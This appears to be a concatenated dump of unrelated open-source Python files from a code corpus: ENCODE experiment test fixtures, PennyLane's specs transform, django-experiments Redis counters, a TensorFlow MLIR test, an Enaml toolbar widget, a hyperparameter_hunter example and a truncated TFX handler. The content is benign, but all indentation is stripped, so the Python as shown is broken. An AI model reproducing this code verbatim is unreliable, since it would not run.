file_ucsc_browser_composite['uuid']).properties['dataset'] != str(item.uuid)
properties.update({
'schema_version': '1',
'files': [file['uuid'], file_ucsc_browser_composite['uuid']]
})
return properties
@pytest.fixture
def experiment_2_0():
return {
'schema_version': '2',
'encode2_dbxrefs': ['wgEncodeEH002945'],
'geo_dbxrefs': ['GSM99494'],
}
@pytest.fixture
def experiment_3():
return {
'schema_version': '3',
'status': "DELETED",
}
@pytest.fixture
def experiment_6():
return {
'schema_version': '6',
'dataset_type': 'experiment',
}
@pytest.fixture
def experiment_7(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '7',
'dbxrefs': ['UCSC-ENCODE-cv:K562', 'UCSC-ENCODE-cv:K562'],
'aliases': ['testing:123', 'testing:123']
})
return properties
@pytest.fixture
def experiment_10(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '10',
'status': 'in progress',
'aliases': [
'andrew-fire:my_experiment',
'j-michael-cherry:Lib:XZ:20100107:11--ChIP:XZ:20100104:09:AdiposeNuclei:H3K4Me3',
'roadmap-epigenomics:Bisulfite-Seq analysis of ucsf-4* stem cell line from UCSF-4||Tue Apr 16 16:10:36 -0500 2013||85822',
'encode:[this is]_qu#ite:bad" ',
'manuel-garber:10% DMSO for 2 hours',
'UCSC_encode_db:Illumina_HiSeq_2000',
'encode:Illumina_HiSeq_2000'
]
})
return properties
@pytest.fixture
def experiment_13(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '13',
'status': 'proposed',
})
return properties
@pytest.fixture
def experiment_14(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '14',
'biosample_type': 'in vitro sample',
})
return properties
@pytest.fixture
def experiment_15(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '15',
'biosample_type': 'immortalized cell line'
})
return properties
@pytest.fixture
def experiment_16(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '16',
'biosample_type': 'immortalized cell line',
'status': 'ready for review'
})
return properties
@pytest.fixture
def experiment_17(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '17',
'biosample_type': 'immortalized cell line',
'status': 'started'
})
return properties
@pytest.fixture
def experiment_21(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '21',
'biosample_type': 'induced pluripotent stem cell line',
'status': 'started'
})
return properties
@pytest.fixture
def experiment_22(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '22',
'biosample_type': 'primary cell',
'biosample_term_id': 'CL:0000765',
'biosample_term_name': 'erythroblast',
'internal_tags': ['cre_inputv10', 'cre_inputv11', 'ENCYCLOPEDIAv3'],
'status': 'started'
})
return properties
@pytest.fixture
def experiment_25(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '25',
'assay_term_name': 'ISO-seq'
})
return properties
@pytest.fixture
def experiment_26(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '26',
'assay_term_name': 'single-nuclei ATAC-seq'
})
return properties
@pytest.fixture
def experiment_27(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '27',
'experiment_classification': ['functional genomics assay']
})
return properties
@pytest.fixture
def experiment(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def base_experiment(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': heart['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_with_RNA_library(
testapp,
base_experiment,
base_replicate,
base_library,
):
testapp.patch_json(base_library['@id'], {'nucleic_acid_term_name': 'RNA'})
testapp.patch_json(base_replicate['@id'], {'library': base_library['@id']})
return testapp.get(base_experiment['@id'] + '@@index-data')
@pytest.fixture
def ChIP_experiment(testapp, lab, award, cell_free, target, base_matched_set):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ChIP-seq',
'biosample_ontology': cell_free['uuid'],
'target': target['@id'],
'possible_controls': [
base_matched_set['@id']]
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def micro_rna_experiment(
testapp,
base_experiment,
replicate_1_1,
replicate_2_1,
library_1,
library_2,
biosample_1,
biosample_2,
mouse_donor_1_6,
file_fastq_3,
file_fastq_4,
file_bam_1_1,
file_bam_2_1,
file_tsv_1_1,
file_tsv_1_2,
spearman_correlation_quality_metric,
micro_rna_quantification_quality_metric_1_2,
micro_rna_mapping_quality_metric_2_1,
analysis_step_run_bam,
analysis_step_version_bam,
analysis_step_bam,
pipeline_bam,
):
testapp.patch_json(file_fastq_3['@id'], {'read_length': 20})
testapp.patch_json(file_fastq_4['@id'], {'read_length': 100})
testapp.patch_json(
file_bam_1_1['@id'],
{'step_run': analysis_step_run_bam['@id'], 'assembly': 'mm10'}
)
testapp.patch_json(
file_bam_2_1['@id'],
{'step_run': analysis_step_run_bam['@id'], 'assembly': 'mm10'}
)
testapp.patch_json(
pipeline_bam['@id'],
{'title': 'microRNA-seq pipeline'}
)
testapp.patch_json(
spearman_correlation_quality_metric['@id'],
{'quality_metric_of': [file_tsv_1_1['@id'], file_tsv_1_2['@id']]}
)
testapp.patch_json(biosample_1['@id'], {'donor': mouse_donor_1_6['@id']})
testapp.patch_json(biosample_2['@id'], {'donor': mouse_donor_1_6['@id']})
testapp.patch_json(biosample_1['@id'], {'organism': '/organisms/mouse/'})
testapp.patch_json(biosample_2['@id'], {'organism': '/organisms/mouse/'})
testapp.patch_json(biosample_1['@id'], {'model_organism_sex': 'mixed'})
testapp.patch_json(biosample_2['@id'], {'model_organism_sex': 'mixed'})
testapp.patch_json(library_1['@id'], {'biosample': biosample_1['@id']})
testapp.patch_json(library_2['@id'], {'biosample': biosample_2['@id']})
testapp.patch_json(replicate_1_1['@id'], {'library': library_1['@id']})
testapp.patch_json(replicate_2_1['@id'], {'library': library_2['@id']})
testapp.patch_json(file_tsv_1_1['@id'], {'output_type': 'microRNA quantifications'})
testapp.patch_json(file_tsv_1_2['@id'], {'output_type': 'microRNA quantifications'})
testapp.patch_json(
base_experiment['@id'],
{'status': 'released', 'date_released': '2016-01-01', 'assay_term_name': 'microRNA-seq'}
)
return testapp.get(base_experiment['@id'] + '@@index-data')
@pytest.fixture
def experiment_with_analysis(testapp, lab, award, heart, analysis_1):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'ChIP-seq',
'status': 'in progress',
'biosample_ontology': heart['uuid'],
'analyses': [analysis_1['@id']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_with_analysis_2(testapp, lab, award, heart, analysis_2):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'ChIP-seq',
'status': 'in progress',
'biosample_ontology': heart['uuid'],
'analyses': [analysis_2['@id']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_28(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'Mint-ChIP-seq',
'biosample_ontology': heart['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_v28(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '28',
'internal_status': 'pipeline error',
'pipeline_error_detail': 'The pipeline didn\'t work for reasons',
'notes': 'Insert essential details here'
})
return properties
@pytest.fixture
def ATAC_experiment(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ATAC-seq',
'biosample_ontology': cell_free['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def experiment_29(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '29',
'assay_term_name': 'single cell isolation followed by RNA-seq'
})
return properties
@pytest.fixture
def experiment_mint_chip(testapp, lab, award, heart, target_H3K27me3, experiment_chip_control):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'Mint-ChIP-seq',
'biosample_ontology': heart['uuid'],
'status': 'in progress',
'target': target_H3K27me3['uuid'],
'possible_controls': [experiment_chip_control['uuid']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def ATAC_experiment_replicated(testapp, lab, award, heart):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ATAC-seq',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def experiment_30(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '30',
'analyses': [
{
'files': ['/files/ENCFF881NAX/', '/files/ENCFF674HJF/']
},
{
'files': ['/files/ENCFF282TIA/', '/files/ENCFF910JDS/']
},
],
'notes': 'Previous notes.'
})
return properties
@pytest.fixture
def ChIA_PET_experiment(testapp, lab, encode4_award, heart):
item = {
'lab': lab['@id'],
'award': encode4_award['@id'],
'assay_term_name': 'ChIA-PET',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def experiment_31(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '31',
'assay_term_name': 'single-nucleus RNA-seq'
})
return properties
@pytest.fixture
def BruChase_2h(testapp, lab, award, heart):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'BruChase',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def BruChase_6h(testapp, lab, award, heart):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'BruChase',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item).json['@graph'][0]
@pytest.fixture
def single_cell_ATAC_experiment(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '32',
'assay_term_name': 'single-cell ATAC-seq'
})
return properties
@pytest.fixture
def experiment_33(root, experiment, analysis_released):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '33',
'analysis_objects': [analysis_released['uuid']]
})
return properties
@pytest.fixture
def base_single_cell_experiment_submitted(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'single-cell RNA sequencing assay',
'biosample_ontology': heart['uuid'],
'status': 'submitted',
'date_submitted': '2015-07-23',
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_34(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '34',
'internal_tags': ['RegulomeDB']
})
return properties
@pytest.fixture
def experiment_35(root, experiment):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
properties.update({
'schema_version': '35',
'assay_term_name': 'Capture Hi-C'
})
return properties
|
pennylane/transforms/specs.py
|
ral9000/pennylane
| 712 |
76447
|
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Code for resource estimation"""
import inspect
import pennylane as qml
def _get_absolute_import_path(fn):
return f"{inspect.getmodule(fn).__name__}.{fn.__name__}"
def specs(qnode, max_expansion=None):
"""Resource information about a quantum circuit.
This transform converts a QNode into a callable that provides resource information
about the circuit.
Args:
qnode (.QNode): the QNode to calculate the specifications for
Keyword Args:
max_expansion (int): The number of times the internal circuit should be expanded when
calculating the specification. Defaults to ``qnode.max_expansion``.
Returns:
A function that has the same argument signature as ``qnode``. This function
returns a dictionary of information about qnode structure.
**Example**
.. code-block:: python3
x = np.array([0.1, 0.2])
dev = qml.device('default.qubit', wires=2)
@qml.qnode(dev)
def circuit(x, add_ry=True):
qml.RX(x[0], wires=0)
qml.CNOT(wires=(0,1))
if add_ry:
qml.RY(x[1], wires=1)
return qml.probs(wires=(0,1))
>>> qml.specs(circuit)(x, add_ry=False)
{'gate_sizes': defaultdict(int, {1: 1, 2: 1}),
'gate_types': defaultdict(int, {'RX': 1, 'CNOT': 1}),
'num_operations': 2,
'num_observables': 1,
'num_diagonalizing_gates': 0,
'num_used_wires': 2,
'depth': 2,
'num_device_wires': 2,
'device_name': 'default.qubit.autograd',
'diff_method': 'backprop'}
.. UsageDetails::
``qml.specs`` can also be used with :class:`~.beta.qnode`:
.. code-block:: python3
x = np.array([0.1, 0.2])
dev = qml.device('default.qubit', wires=2)
@qml.beta.qnode(dev, diff_method="parameter-shift", shift=np.pi / 4)
def circuit(x, add_ry=True):
qml.RX(x[0], wires=0)
qml.CNOT(wires=(0,1))
if add_ry:
qml.RY(x[1], wires=1)
return qml.probs(wires=(0,1))
>>> qml.specs(circuit)(x, add_ry=False)
{'gate_sizes': defaultdict(int, {1: 1, 2: 1}),
'gate_types': defaultdict(int, {'RX': 1, 'CNOT': 1}),
'num_operations': 2,
'num_observables': 1,
'num_diagonalizing_gates': 0,
'num_used_wires': 2,
'depth': 2,
'num_trainable_params': 1,
'num_device_wires': 2,
'device_name': 'default.qubit',
'diff_method': 'parameter-shift',
'expansion_strategy': 'gradient',
'gradient_options': {'shift': 0.7853981633974483},
'interface': 'autograd',
'gradient_fn': 'pennylane.gradients.parameter_shift.param_shift',
'num_gradient_executions': 2}
"""
def specs_qnode(*args, **kwargs):
"""Returns information on the structure and makeup of provided QNode.
Dictionary keys:
* ``"num_operations"``
* ``"num_observables"``
* ``"num_diagonalizing_gates"``
* ``"gate_sizes"``: dictionary mapping gate number of wires to number of occurances
* ``"gate_types"``: dictionary mapping gate types to number of occurances
* ``"num_used_wires"``: number of wires used by the circuit
* ``"num_device_wires"``: number of wires in device
* ``"depth"``: longest path in directed acyclic graph representation
* ``"dev_short_name"``: name of QNode device
* ``"diff_method"``
Potential Additional Information:
* ``"num_trainable_params"``: number of individual scalars that are trainable
* ``"num_parameter_shift_executions"``: number of times circuit will execute when
calculating the derivative
Returns:
dict[str, Union[defaultdict,int]]: dictionaries that contain QNode specifications
"""
initial_max_expansion = qnode.max_expansion
qnode.max_expansion = max_expansion
try:
qnode.construct(args, kwargs)
finally:
qnode.max_expansion = initial_max_expansion
if isinstance(qnode, qml.QNode):
# TODO: remove when the old QNode is removed
return qnode.specs
info = qnode.qtape.specs.copy()
info["num_device_wires"] = qnode.device.num_wires
info["device_name"] = qnode.device.short_name
info["expansion_strategy"] = qnode.expansion_strategy
info["gradient_options"] = qnode.gradient_kwargs
info["interface"] = qnode.interface
info["diff_method"] = (
_get_absolute_import_path(qnode.diff_method)
if callable(qnode.diff_method)
else qnode.diff_method
)
if isinstance(qnode.gradient_fn, qml.gradients.gradient_transform):
info["gradient_fn"] = _get_absolute_import_path(qnode.gradient_fn)
try:
info["num_gradient_executions"] = len(qnode.gradient_fn(qnode.qtape)[0])
except Exception as e: # pylint: disable=broad-except
# In the case of a broad exception, we don't want the `qml.specs` transform
# to fail. Instead, we simply indicate that the number of gradient executions
# is not supported for the reason specified.
info["num_gradient_executions"] = f"NotSupported: {str(e)}"
else:
info["gradient_fn"] = qnode.gradient_fn
return info
return specs_qnode
|
experiments/counters.py
|
PetrDlouhy/django-experiments
| 237 |
76462
|
from django.utils.functional import cached_property
from redis.exceptions import ConnectionError, ResponseError
from experiments.redis_client import get_redis_client
COUNTER_CACHE_KEY = 'experiments:participants:%s'
COUNTER_FREQ_CACHE_KEY = 'experiments:freq:%s'
class Counters(object):
@cached_property
def _redis(self):
return get_redis_client()
def increment(self, key, participant_identifier, count=1):
if count == 0:
return
try:
cache_key = COUNTER_CACHE_KEY % key
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
new_value = self._redis.hincrby(cache_key, participant_identifier, count)
# Maintain histogram of per-user counts
if new_value > count:
self._redis.hincrby(freq_cache_key, new_value - count, -1)
self._redis.hincrby(freq_cache_key, new_value, 1)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
pass
def clear(self, key, participant_identifier):
try:
# Remove the direct entry
cache_key = COUNTER_CACHE_KEY % key
pipe = self._redis.pipeline()
freq, _ = pipe.hget(cache_key, participant_identifier).hdel(cache_key, participant_identifier).execute()
# Remove from the histogram
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
self._redis.hincrby(freq_cache_key, freq or 0, -1)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
pass
def get(self, key):
try:
cache_key = COUNTER_CACHE_KEY % key
return self._redis.hlen(cache_key)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return 0
def get_frequency(self, key, participant_identifier):
try:
cache_key = COUNTER_CACHE_KEY % key
freq = self._redis.hget(cache_key, participant_identifier)
return int(freq) if freq else 0
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return 0
def get_frequencies(self, key):
try:
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
# In some cases when there are concurrent updates going on, there can
# briefly be a negative result for some frequency count. We discard these
# as they shouldn't really affect the result, and they are about to become
# zero anyway.
return dict((int(k), int(v)) for (k, v) in self._redis.hgetall(freq_cache_key).items() if int(v) > 0)
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return dict()
def reset(self, key):
try:
cache_key = COUNTER_CACHE_KEY % key
self._redis.delete(cache_key)
freq_cache_key = COUNTER_FREQ_CACHE_KEY % key
self._redis.delete(freq_cache_key)
return True
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return False
def reset_pattern(self, pattern_key):
#similar to above, but can pass pattern as arg instead
try:
cache_key = COUNTER_CACHE_KEY % pattern_key
for key in self._redis.keys(cache_key):
self._redis.delete(key)
freq_cache_key = COUNTER_FREQ_CACHE_KEY % pattern_key
for key in self._redis.keys(freq_cache_key):
self._redis.delete(key)
return True
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
return False
def reset_prefix(self, key_prefix):
# Delete all data in redis for a given key prefix
from experiments.utils import grouper
try:
for key_pattern in [COUNTER_CACHE_KEY, COUNTER_FREQ_CACHE_KEY]:
match = "%s:*" % (key_pattern % key_prefix)
key_iter = self._redis.scan_iter(match)
# Delete keys in groups of 1000 to prevent problems with long
# running experiments having many participants
for keys in grouper(key_iter, 1000):
# The last group will be padded with None to reach the specified batch
# size, so these are filtered out here
self._redis.delete(*filter(None, keys))
except (ConnectionError, ResponseError):
# Handle Redis failures gracefully
pass
|
tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/structured_output.py
|
joshz123/tensorflow
| 388 |
76476
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# RUN: %p/structured_output | FileCheck %s
# pylint: disable=missing-docstring,line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common
class TestModule(tf.Module):
# The fNNNN name prefixes in this file are such that the sorted order of the
# functions in the resulting MLIR output match the order in the source file,
# allowing us to conveniently co-locate the CHECK's with the code they are
# checking.
#
# Note: CHECK-DAG doesn't work with CHECK-SAME/CHECK-NEXT.
# Check index paths for results.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = []})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0000_single_return"]
@tf.function(input_signature=[])
def f0000_single_return(self):
return tf.constant(1.0, shape=[1])
# Check index paths for results with multiple return values.
# Note that semantically in Python, multiple return values are equivalent
# to returning a tuple/list.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0001_multiple_results_no_punctuation"]
@tf.function(input_signature=[])
def f0001_multiple_results_no_punctuation(self):
return tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2])
# Check index paths for results written explicitly with parentheses.
# This is semantically equivalent to the earlier test without parentheses,
# but this test serves as documentation of this behavior for the purposes
# of tf_saved_model users.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0002_multiple_results_parentheses"]
@tf.function(input_signature=[])
def f0002_multiple_results_parentheses(self):
return (tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2]))
# Check index paths for results written explicitly with brackets.
# This is semantically equivalent to the earlier test without parentheses,
# but this test serves as documentation of this behavior for the purposes
# of tf_saved_model users.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0003_multiple_results_brackets"]
@tf.function(input_signature=[])
def f0003_multiple_results_brackets(self):
return [tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2])]
# Check index paths for lists.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = [0, 0]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = [0, 1]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0004_list_2_elements"]
@tf.function(input_signature=[])
def f0004_list_2_elements(self):
return [[tf.constant(1.0, shape=[1]), tf.constant(1.0, shape=[2])]]
# Check index paths for dicts.
# Keys are linearized in sorted order, matching `tf.nest.flatten`.
# More thorough testing of this is in structured_input.py. The underlying code
# path for linearization is shared, so no need to replicate that testing here.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}() -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = ["x"]},
# CHECK-SAME: tensor<2xf32> {tf_saved_model.index_path = ["y"]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0005_dict_2_keys"]
@tf.function(input_signature=[])
def f0005_dict_2_keys(self):
return {
'x': tf.constant(1.0, shape=[1]),
'y': tf.constant(1.0, shape=[2]),
}
# Check index paths for outputs are correctly handled in the presence of
# multiple return statements.
#
# CHECK: func {{@[a-zA-Z_0-9]+}}(
# CHECK-SAME: %arg0: tensor<f32> {tf_saved_model.index_path = [0]}
# CHECK-SAME: ) -> (
# CHECK-SAME: tensor<1xf32> {tf_saved_model.index_path = ["x"]})
# CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["f0006_multiple_return_statements"]
@tf.function(input_signature=[tf.TensorSpec([], tf.float32)])
def f0006_multiple_return_statements(self, x):
if x > 3.:
return {'x': tf.constant(1.0, shape=[1])}
else:
return {'x': tf.constant(1.0, shape=[1])}
if __name__ == '__main__':
common.do_test(TestModule)
|
enaml/widgets/tool_bar.py
|
xtuzy/enaml
| 1,080 |
76487
|
<gh_stars>1000+
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Bool, Enum, List, Typed, ForwardTyped, observe
from enaml.core.declarative import d_
from .action import Action
from .action_group import ActionGroup
from .constraints_widget import ConstraintsWidget, ProxyConstraintsWidget
class ProxyToolBar(ProxyConstraintsWidget):
""" The abstract definition of a proxy ToolBar object.
"""
#: A reference to the ToolBar declaration.
declaration = ForwardTyped(lambda: ToolBar)
def set_button_style(self, style):
raise NotImplementedError
def set_movable(self, movable):
raise NotImplementedError
def set_floatable(self, floatable):
raise NotImplementedError
def set_floating(self, floating):
raise NotImplementedError
def set_dock_area(self, area):
raise NotImplementedError
def set_allowed_dock_areas(self, areas):
raise NotImplementedError
def set_orientation(self, orientation):
raise NotImplementedError
class ToolBar(ConstraintsWidget):
""" A widget which displays a row of tool buttons.
A ToolBar is typically used as a child of a MainWindow where it can
be dragged and docked in various locations in the same fashion as a
DockPane. However, a ToolBar can also be used as the child of a
Container and layed out with constraints, though in this case it will
lose its ability to be docked.
"""
#: The button style to apply to actions added to the tool bar.
button_style = d_(Enum(
'icon_only', 'text_only', 'text_beside_icon', 'text_under_icon'
))
#: Whether or not the tool bar is movable by the user. This value
#: only has meaning if the tool bar is the child of a MainWindow.
movable = d_(Bool(True))
#: Whether or not the tool bar can be floated as a separate window.
#: This value only has meaning if the tool bar is the child of a
#: MainWindow.
floatable = d_(Bool(True))
#: A boolean indicating whether or not the tool bar is floating.
#: This value only has meaning if the tool bar is the child of a
#: MainWindow.
floating = d_(Bool(False))
#: The dock area in the MainWindow where the tool bar is docked.
#: This value only has meaning if the tool bar is the child of a
#: MainWindow.
dock_area = d_(Enum('top', 'right', 'left', 'bottom'))
#: The areas in the MainWindow where the tool bar can be docked
#: by the user. This value only has meaning if the tool bar is the
#: child of a MainWindow.
allowed_dock_areas = d_(List(
Enum('top', 'right', 'left', 'bottom', 'all'), ['all'],
))
#: The orientation of the toolbar. This only has meaning when the
#: toolbar is not a child of a MainWindow and is used as part of
#: a constraints based layout.
orientation = d_(Enum('horizontal', 'vertical'))
#: Whether or not to automatically adjust the 'hug_width' and
#: 'hug_height' values based on the value of 'orientation'.
auto_hug = d_(Bool(True))
#: A reference to the ProxyToolBar object.
proxy = Typed(ProxyToolBar)
def items(self):
""" Get the items defined on the tool bar.
"""
allowed = (Action, ActionGroup)
return [c for c in self.children if isinstance(c, allowed)]
#--------------------------------------------------------------------------
# Observers
#--------------------------------------------------------------------------
@observe('button_style', 'movable', 'floatable', 'floating', 'dock_area',
'allowed_dock_areas', 'orientation')
def _update_proxy(self, change):
""" An observer which sends state change to the proxy.
"""
# The superclass handler implementation is sufficient.
super(ToolBar, self)._update_proxy(change)
#--------------------------------------------------------------------------
# DefaultValue Handlers
#--------------------------------------------------------------------------
def _default_hug_width(self):
""" Get the default hug width for the slider.
The default hug width is computed based on the orientation.
"""
if self.orientation == 'horizontal':
return 'ignore'
return 'strong'
def _default_hug_height(self):
""" Get the default hug height for the slider.
The default hug height is computed based on the orientation.
"""
if self.orientation == 'vertical':
return 'ignore'
return 'strong'
#--------------------------------------------------------------------------
# PostSetAttr Handlers
#--------------------------------------------------------------------------
def _post_setattr_orientation(self, old, new):
""" Post setattr the orientation for the tool bar.
If auto hug is enabled, the hug values will be updated.
"""
if self.auto_hug:
if new == 'vertical':
self.hug_width = 'strong'
self.hug_height = 'ignore'
else:
self.hug_width = 'ignore'
self.hug_height = 'strong'
|
Lib/test/test_compiler/testcorpus/77_class__class__no_class.py
|
diogommartins/cinder
| 1,886 |
76497
|
def f():
def g():
__class__
|
examples/simple_experiment_example.py
|
shaoeric/hyperparameter_hunter
| 688 |
76498
|
<gh_stars>100-1000
from hyperparameter_hunter import Environment, CVExperiment
from hyperparameter_hunter.utils.learning_utils import get_toy_classification_data
from xgboost import XGBClassifier
def execute():
env = Environment(
train_dataset=get_toy_classification_data(),
results_path="HyperparameterHunterAssets",
metrics=["roc_auc_score"],
cv_type="StratifiedKFold",
cv_params=dict(n_splits=5, shuffle=True, random_state=32),
)
experiment = CVExperiment(
model_initializer=XGBClassifier,
model_init_params=dict(
objective="reg:linear", max_depth=3, n_estimators=100, subsample=0.5
),
)
if __name__ == "__main__":
execute()
|
tfx/orchestration/portable/system_node_handler.py
|
avelez93/tfx
| 1,813 |
76501
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The base class of all system node handlers."""
import abc
from tfx.orchestration import metadata
from tfx.proto.orchestration import pipeline_pb2
from ml_metadata.proto import metadata_store_pb2
class SystemNodeHandler(abc.ABC):
"""SystemNodeHandler is the base class of all system nodes' handler."""
@abc.abstractmethod
def run(
self,
mlmd_connection: metadata.Metadata,
pipeline_node: pipeline_pb2.PipelineNode,
